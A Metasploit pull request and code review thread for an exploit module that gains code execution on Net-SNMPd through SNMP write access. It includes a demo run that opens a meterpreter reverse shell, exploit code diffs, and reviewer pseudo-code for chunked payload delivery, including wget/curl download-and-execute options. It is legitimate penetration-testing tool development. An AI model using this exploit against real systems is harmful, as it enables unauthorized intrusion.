### PR TITLE
Linux net snmpd rw access

### PR DESCRIPTION
**Pull request by steve-embling**
Adds an exploit for authenticated read/write access on Net-SNMPd.

Note this is a re-opening of PR https://github.com/rapid7/metasploit-framework/pull/9341

## Verification
Tested against Ubuntu 16.04
- [ ] Install snmpd `apt-get install snmpd`
- [ ] Add a rw user to the snmpd configuration
- [ ] Restart snmpd service `service snmpd restart`
- [ ] Start `msfconsole`
- [ ] Do: `use exploit/linux/snmp/net_snmpd_rw_access `
- [ ] Set SNMP version `set version 2c`
- [ ] Set R/W Community string, e.g `set community private`
- [ ] Set RHOST
- [ ] Select desired payload
- [ ] `exploit`
- [ ] Verify the shell is returned

## Demo
```
msf > use exploit/linux/snmp/net_snmpd_rw_access 
msf exploit(linux/snmp/net_snmpd_rw_access) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(linux/snmp/net_snmpd_rw_access) > set rhost 192.168.1.3
rhost => 192.168.1.3
msf exploit(linux/snmp/net_snmpd_rw_access) > set lhost 192.168.1.2
lhost => 192.168.1.2
msf exploit(linux/snmp/net_snmpd_rw_access) > set community private
community => private
msf exploit(linux/snmp/net_snmpd_rw_access) > set version 2c
version => 2c
msf exploit(linux/snmp/net_snmpd_rw_access) > show options

Module options (exploit/linux/snmp/net_snmpd_rw_access):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CHUNKSIZE  200              yes       Maximum bytes of payload to write at once 
   COMMUNITY  private          yes       SNMP Community String
   FILEPATH   /tmp             yes       file path to write to 
   RETRIES    1                yes       SNMP Retries
   RHOST      192.168.1.3      yes       The target address
   RPORT      161              yes       The target port (UDP)
   TIMEOUT    1                yes       SNMP Timeout
   VERSION    2c               yes       SNMP Version <1/2c>


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.2    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf exploit(linux/snmp/net_snmpd_rw_access) > show info

       Name: Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution
     Module: exploit/linux/snmp/net_snmpd_rw_access
   Platform: 
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Steve Embling at InteliSecure

Available targets:
  Id  Name
  --  ----
  0   Linux x86

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  CHUNKSIZE  200              yes       Maximum bytes of payload to write at once 
  COMMUNITY  private          yes       SNMP Community String
  FILEPATH   /tmp             yes       file path to write to 
  RETRIES    1                yes       SNMP Retries
  RHOST      192.168.1.3      yes       The target address
  RPORT      161              yes       The target port (UDP)
  TIMEOUT    1                yes       SNMP Timeout
  VERSION    2c               yes       SNMP Version <1/2c>

Payload information:
  Space: 4096

Description:
  This exploit module exploits the SNMP write access configuration 
  ability of SNMP-EXTEND-MIB to configure MIB extensions and lead to 
  remote code execution.

References:
  https://www.intelisecure.com

msf exploit(linux/snmp/net_snmpd_rw_access) > run

[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] Writing to NET-SNMP-EXTEND-MIB with given payload
[*] Payload generated. Sending in 200 byte chunk increments.
[*] Sent chunked executable. Now executing payload
[*] Sending stage (849108 bytes) to 192.168.1.3
[+] SNMP request timeout (this is promising).

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.3 - Meterpreter session 1 closed.  Reason: User exit

```

### CODE REVIEW

**Comment by steve-embling** [comment]
Hi all.

I've got some time coming up in two weeks where I can make any changes to this and test a couple more platforms. In terms of cleanup or changes for getting this pulled is anything further required?

File: documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md [hunk 1]
```diff
@@ -0,0 +1,87 @@
...
+  1. Start `msfconsole`
+  2. Do: `use exploit/linux/snmp/net_snmpd_rw_access`
+  3. Do: `set rhost [IP]`
+  4. Do: `set community [SNMP Community]`
+  5. Do: `set version [SNMP Version]`
+  4. Configure the payload
+  5. Do: `run`
+  6. You should get a session
+
+
```
Comment (bcoles) [inline documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md]: Consider adding an `options` section here to describe the module options (`version`, `community`, etc).

File: documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md [hunk 2]
```diff
@@ -0,0 +1,87 @@
...
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/linux/snmp/net_snmpd_rw_access`
+  3. Do: `set rhost [IP]`
+  4. Do: `set community [SNMP Community]`
+  5. Do: `set version [SNMP Version]`
+  4. Configure the payload
+  5. Do: `run`
+  6. You should get a session
```
Comment (bcoles) [inline documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md]: 1, 2, 3, 4, 5, 6, 7, 8

File: documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md [hunk 3]
```diff
@@ -0,0 +1,87 @@
...
+
+
+## Example Run
```
Comment (bcoles) [inline documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md]: h00die, lord of documentation, will probably want you to label this section `Scenarios`

File: modules/exploits/linux/snmp/net_snmpd_rw_access.rb [hunk 4]
```diff
@@ -0,0 +1,130 @@
...
+  end
+
+  #
+  # The exploit method connects and sets:
+  # NET-SNMP-EXTEND-MIB::nsExtendStatus."tmp" = INTEGER: createAndGo(4)
+  # NET-SNMP-EXTEND-MIB::nsExtendCommand."tmp" = STRING: /path/to/executable
+  # NET-SNMP-EXTEND-MIB::nsExtendArgs."tmp" = STRING: arguments
+  #
+  def exploit
+    @payload_name = "#{rand_text_alpha(5)}"
```
Comment (bcoles) [inline modules/exploits/linux/snmp/net_snmpd_rw_access.rb]: Is there a reason you're using a `@` class variable here? This seems unnecessary as `exploit` is the only method.

File: modules/exploits/linux/snmp/net_snmpd_rw_access.rb [hunk 5]
```diff
@@ -0,0 +1,130 @@
...
+    chunk_size = datastore['CHUNKSIZE']
+    chunk_size = chunk_size.to_i
+    print_status("Payload generated. Sending in " + chunk_size.to_s + " byte chunk increments.")
+    while i <= payload_exe.length
+      ii = i + chunk_size
+      if ii > payload_exe.length
+        ii = -1
+      end
+      vprint_status(i.to_s + " " + ii.to_s)
+      oid_3_value = "-c \"printf \'"+ payload_exe[i..ii]+"\' >> #{full_path}.1\""
```
Comment (bcoles) [inline modules/exploits/linux/snmp/net_snmpd_rw_access.rb]: This is hard to read.

This is slightly easier to read:

```ruby
      oid_3_value = "-c \"printf '#{payload_exe[i..ii]}' >> #{full_path}.1\""
```

File: modules/exploits/linux/snmp/net_snmpd_rw_access.rb [hunk 6]
```diff
@@ -0,0 +1,130 @@
...
+    oid_1_value = 4
+    oid_2 = '1.3.6.1.4.1.8072.1.3.2.2.1.2.3.116.109.112'
+    oid_2_value = "/bin/bash"
+    oid_3 = '1.3.6.1.4.1.8072.1.3.2.2.1.3.3.116.109.112'
+    oid_4 = '1.3.6.1.4.1.8072.1.3.2.4.1.2.3.116.109.112.1'
+    i = 0
+    #vprint_status(payload_exe)
+    chunk_size = datastore['CHUNKSIZE']
+    chunk_size = chunk_size.to_i
+    print_status("Payload generated. Sending in " + chunk_size.to_s + " byte chunk increments.")
```
Comment (bcoles) [inline modules/exploits/linux/snmp/net_snmpd_rw_access.rb]: String interpolation is preferred:

```ruby
print_status("Payload generated. Sending in #{chunk_size} byte chunk increments.")
```

File: modules/exploits/linux/snmp/net_snmpd_rw_access.rb [hunk 7]
```diff
@@ -0,0 +1,130 @@
...
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution',
+        'Description'    => %q(
+            This exploit module exploits the SNMP write access configuration ability of SNMP-EXTEND-MIB to
+ configure MIB extensions and lead to remote code execution.
```
Comment (bcoles) [inline modules/exploits/linux/snmp/net_snmpd_rw_access.rb]: Indentation.
```
            This exploit module exploits the SNMP write access configuration ability of SNMP-EXTEND-MIB
            to configure MIB extensions and lead to remote code execution.
```

File: modules/exploits/linux/snmp/net_snmpd_rw_access.rb [hunk 8]
```diff
@@ -0,0 +1,130 @@
...
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => ['Steve Embling at InteliSecure'],
+        'References'     =>
+          [
+            [ 'URL', 'https://www.intelisecure.com']
+          ],
+        'Payload'        =>
+          {
+            'Space'    => 4096 #arbitrary, but it seems to max out the size
```
Comment (bcoles) [inline modules/exploits/linux/snmp/net_snmpd_rw_access.rb]: This comment is confusing.

File: modules/exploits/linux/snmp/net_snmpd_rw_access.rb [hunk 9]
```diff
@@ -0,0 +1,130 @@
...
+    #vprint_status(payload_exe)
+    chunk_size = datastore['CHUNKSIZE']
+    chunk_size = chunk_size.to_i
+    print_status("Payload generated. Sending in " + chunk_size.to_s + " byte chunk increments.")
+    while i <= payload_exe.length
+      ii = i + chunk_size
+      if ii > payload_exe.length
+        ii = -1
+      end
+      vprint_status(i.to_s + " " + ii.to_s)
```
Comment (bcoles) [inline modules/exploits/linux/snmp/net_snmpd_rw_access.rb]: String interpolation is preferred:

```ruby
      vprint_status("#{i} #{ii}")
```

**Comment by bcoles** [comment]
It seems GitHub ate some of my comments.

Each instance of:

```ruby
SNMP::Manager.open(:Host => datastore['RHOST'], :Port => datastore['RPORT'], :Community => datastore['COMMUNITY']) do |manager|
```

Can be replaced with:

```ruby
SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => comm) do |manager|
```

File: modules/exploits/linux/snmp/net_snmpd_rw_access.rb (hunk 8 above)
Comment (steve-embling) [reply modules/exploits/linux/snmp/net_snmpd_rw_access.rb]: Thanks, what I meant here is I set it to 20Megs and the payload generated used all the space. So I set it to an arbitrary max size of 4096. Having never touched metasploit source before I'm not sure how this should be handled or what this value should be. Advice appreciated.

File: modules/exploits/linux/snmp/net_snmpd_rw_access.rb (hunk 4 above)
Comment (steve-embling) [reply modules/exploits/linux/snmp/net_snmpd_rw_access.rb]: No reason, I don't know ruby at all (this is my first look at it - so I almost certainly lifted this from some documentation or another module - will get this changed thanks.

**Comment by steve-embling** [comment]
I'll get these changed the next week or so - thanks for the comments.

**Comment by steve-embling** [comment]
I think I've addressed the comments, but will not be able to re-test until early next week.

**Comment by bcoles** [comment]
The changes look good.

The formatting of the `options` in the documentation might anger the local documentation overlord, which is my bad, I should have offered [some](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md) [examples](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/samba/is_known_pipename.md).

**Comment by bcoles** [comment]
Have you tried implementing the payload delivery using a Metasploit [command stager](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/cmdstager.rb) ? Just curious. This module would probably work well with the command stager. This would take care of the payload chunking for you, which is nice. Implementing the response checking on the final request might be problematic.

You can find examples of command stager implementations on Linux with: `grep -rn "execute_cmdstager" modules/exploits/linux/`.

Here's some very rough untested psuedo-code that does no error checking, as an example, and certainly won't work without modifications.

The approach of wrapping the command in `-c ""` is rather janky.  I think there's a way to overwrite the default interpreter but I can't find it at the moment. An alternative would be to grab the automatically generated command from the `cmd` parameter by splitting by whitespace, then overwrite `oid_2_value = "/bin/bash"` with the extracted command.

```ruby

  #
  # The exploit method connects and sets:
  # NET-SNMP-EXTEND-MIB::nsExtendStatus."tmp" = INTEGER: createAndGo(4)
  # NET-SNMP-EXTEND-MIB::nsExtendCommand."tmp" = STRING: /path/to/executable
  # NET-SNMP-EXTEND-MIB::nsExtendArgs."tmp" = STRING: arguments
  #
  def execute_command(cmd, opts = {})

    # NET-SNMP-EXTEND-MIB::nsExtendStatus."tmp" = INTEGER: createAndGo(4)
    oid_1 = '1.3.6.1.4.1.8072.1.3.2.2.1.21.3.116.109.112'
    oid_1_value = 4
    oid_2 = '1.3.6.1.4.1.8072.1.3.2.2.1.2.3.116.109.112'
    oid_2_value = "/bin/bash"
    oid_3 = '1.3.6.1.4.1.8072.1.3.2.2.1.3.3.116.109.112'
    oid_4 = '1.3.6.1.4.1.8072.1.3.2.4.1.2.3.116.109.112.1'

      comm = datastore['COMMUNITY']
      oid_3_value = "-c \"#{cmd}\""

      SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => @comm) do |manager|
          vprint_status(manager.get_value("sysDescr.0"))
          varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
          varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
          varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))
          resp = manager.set([varbind1, varbind2, varbind3])
          vprint_status(manager.get_value(oid_4).to_s)
      end
      #Hit same again, first rewrite  appears to remove the MIB, the next reinstates it.
      SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => @comm) do |manager|
          varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
          varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
          varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))
          resp = manager.set([varbind1, varbind2, varbind3])
          vprint_status(manager.get_value(oid_4).to_s)
      end
    end

  end

  def exploit
    execute_cmdstager(linemax: datastore['CHUNKSIZE'], :temp => datastore['FILEPATH'])
  end
end
```

**Comment by steve-embling** [comment]
Since writing this I've seen an option to fork and execute in the MIB, which would prevent snmpd hanging while meterpreter runs, i think it would be better to implement this over the next week too to be a little more subtle - currently it checks for for the hang to see if everything seems to be working which that would obviously break but that is worth it imo. This change would then allow the exploit to delete the written file on disk and clear the written mibs by itself too which it does not do currently, so again, a little more subtle/client friendly.  

I'd also like to make the MIBs name configurable or random, currently it writes to "tmp" which could conceivably be used by a sysadmin to, say, clear the tmp directory or something, as unlikely as that scenario probably is
  
>Have you tried implementing the payload delivery using a Metasploit command stager ?

Nope, it looks like _exactly_ what I should have used. I'll try to find some examples of its use and see what I can do to use that, but I'm it is likely to be a bit slower going being completely new to Ruby and MSF internals. 

>The approach of wrapping the command in -c "" is rather janky. I think there's a way to overwrite the default interpreter but I can't find it at the moment.

When you say the "default interpreter" is that the default shell chosen by command stager or the system default shell? You lost me a little there. For embedded devices in particular it might be nice if this was user configurable rather than hardcoded, but I guess I'll look at other command stager uses and see what they are doing.  
  
If you have better methods than wrapping in -c "" then I can get that changed too. Again, if I see something when looking through other sources I'll change it, I think I did it this way so I could do a bunch of piping - quick and easy.

**Comment by bcoles** [comment]
Ah yeah my bad I wasn't clear.

I was referring to the example code I provided, where I lazying wrapped the command in `-c ""`. This was done out of laziness so that `oid_2_value` didn't have to be changed from `"/bin/bash"`.

**Comment by bcoles** [comment]
In retrospect my "default interpreter" comments were nonsense - using the split by whitespace approach would make more sense. Not sure if there's a better approach.

When `execute_cmdstager` is invoked within a module, it will use the `execute_command` method in the module to execute commands.

The command stager will chunk the exe, then use the `cmdstager::flavor` (printf, echo, etc) to write the chunks to a file, then chmod and execute the file. The command stager also supports a few download-and-execute `cmdstager::flavor`s with `wget` and `curl`, which can be useful so long as network egress rules allow the connection.

The easiest approach is probably something like this (psuedo code, for demonstration purposes):

```ruby
def execute_command(cmd, opts = {})
  # ... snip ...

  # split the command by whitespace
  bin_path = cmd.split(/\s/).first
  oid_2_value = bin_path

  # ... snip ...

  oid_3_value = cmd.sub(/^#{bin_path}/) # remove the command from the start of the string

  # ... snip ...
end
```

I hope that makes sense?

As an aside, another benefit of supporting the native metasploit command stager is that the `cmdstager::flavor` is user configurable. If some flavors are known not to work, you can easily prevent their use with `deregister_options`. You can find a few examples in the source with `grep -rn "CMDSTAGER::FLAVOR" modules/exploits/`.

**Comment by steve-embling** [comment]
Makes perfect sense - thanks for clarifying.  
I'll have a bit of a play and see how far i get.  
Cheers

**Comment by steve-embling** [comment]
Right, I've ported it over to cmdstager and bourne shell is working but reverse_tcp meterpreter is consistently segfaulting now, and echo/printf aren't working because the nested quoting is stripping characters and the files are getting written out as ascii instead of binary payloads, i think i need to specify the internal quotes to use those flavours - which would be nice to have as an option for more limited systems. I might just sit and play with the quoting or maybe replacing strings until I find something that works reliably.  
  
I constantly forget how awful I find quoting in bash until I need it. I'm not sure if its going to work unless I can specify the internal quotes to escape those characters appropriately.  
  
It is looking much shorter/cleaner though which is nice.

Bourne flavour is segfaulting on meterpreter payloads on most runs which was fairly reliable before. Not sure what the problem is there.  
  
It will likely have to wait next week when I can put some dedicated time into testing this though. I'll keep plugging away but just a quick update..

**Comment by bcoles** [comment]
* Meterpreter itself is segfaulting? That's unusual. Are you using the latest version of msf from GitHub?
* What do you mean by nested quoting?
* `set cmdstager::flavor wget` is usually pretty reliable for testing. Short payload too.

**Comment by steve-embling** [comment]
It's working solidly now after a couple of reboots - not sure why I was getting that issue but it has run run 13x in a row with not a single segfault. So whatever that was is on me. I'll be keeping an eye out for it happening again though.
  
I need to modify the provided echo and printf strings if that flavour is used to allow single quotes within single quotes, calling bash -c with double quotes does not work for writing hex characters (now I remember why I went with base64 before!). I'm hoping that should be a fairly fast change.

**Comment by bcoles** [comment]
Cool. At a guess, the segfaults might have been due to lingering meterpreter processes on the host. I've encountered something similar.

Regarding the issue with quotes, using the split-by-whitespace technique should fix that.

**Comment by steve-embling** [comment]
Hi again, so I believe I have fixed the issues.

Do I need to document all the cmdstager options or is that considered redundant?

**Comment by tletum13** [comment]
I need to document all the cmdstager options

**Comment by steve-embling** [comment]
OK, I've just confirmed all of the enabled cmdstager flavours are working (bourne, wget, echo, printf) which should give decent compatibility across many devices, assuming the escaping works on alternative shells. I assume this will work on ARM and MIPS devices but haven't got anything available to test so haven't added them as targets.
  
I've confirmed that the MIB is no longer present after the connection is torn down too.  
  
I have not fixed the lack of responsiveness from the SNMP server while meterpreter is has spawned until the connection is closed. I may add something bash specific to the "bourne" flavour (as I assume this will be shell specific at best) at some point in the future, but that won't be short term if it works at all.  
  
So if the documentation is alright for this, then I believe that is everything done. I haven't duplicated any cmdstager option documentation. I've assumed that is managed and maintained centrally rather than in the dependent modules - though I might be wrong.

@bcoles - Sorry for mentioning - it's only because of the comment spam making this hard to follow.

**Comment by steve-embling** [comment]
Is this waiting on me to do anything or is anything preventing this being merged?

Thanks.

**Comment by bcoles** [comment]
Hi @steve-embling 

Sorry for the delay. I want to see this module merged. This is waiting on us, not you, although I do have a few comments.

### Escaping

My primary concern with the module is the escaping jankiness. I'm kind of hoping whoever reviews this PR will find a clever way of simplifying this.

```ruby
    if flavor == :echo
      #Add additional escaping for this flavour.
      cmd.gsub!('\\\\x', '\\\\\\\\\\\\\\\\x')
    end
    if flavor == :printf
      #Add additional escaping for this flavour.
      cmd.gsub!('\\', '\\\\\\\\\\')
    end
```

### Check

A check method would be nice. Metasploit has SNMP libraries to check whether a provided community string is valid. I'm not sure if there's a consistent way to check whether the specified community string has rw privs.


### DisclosureDate

The `DisclosureDate` metadata is a mandatory key. Given that this module makes use of intended functionality, it would be best to reference the date of release for the first version of snmpd which supported executing commands. (and also add a URL as a reference).

**Comment by bcoles** [comment]
Related references:
* https://medium.com/rangeforce/snmp-arbitrary-command-execution-19a6088c888e
* https://digi.ninja/blog/snmp_to_shell.php

**Comment by steve-embling** [comment]
OK, will update over then next few weeks - noting the caveat that neither of these posts existed when the pull request was originally opened in Dec 2017!

**Comment by bcoles** [comment]
> 
> 
> OK, will update over then next few weeks - noting the caveat that neither of these posts existed when the pull request was originally opened in Dec 2017!

Agreed. You deserve credit for your work. It is not your fault that this PR has been open for 2 years.

**Comment by dwelch-r7** [comment]
# Release Notes

Adds a new exploit module targeting SNMP which allows for arbitrary code execution provided you have r/w access

**Pull request merged**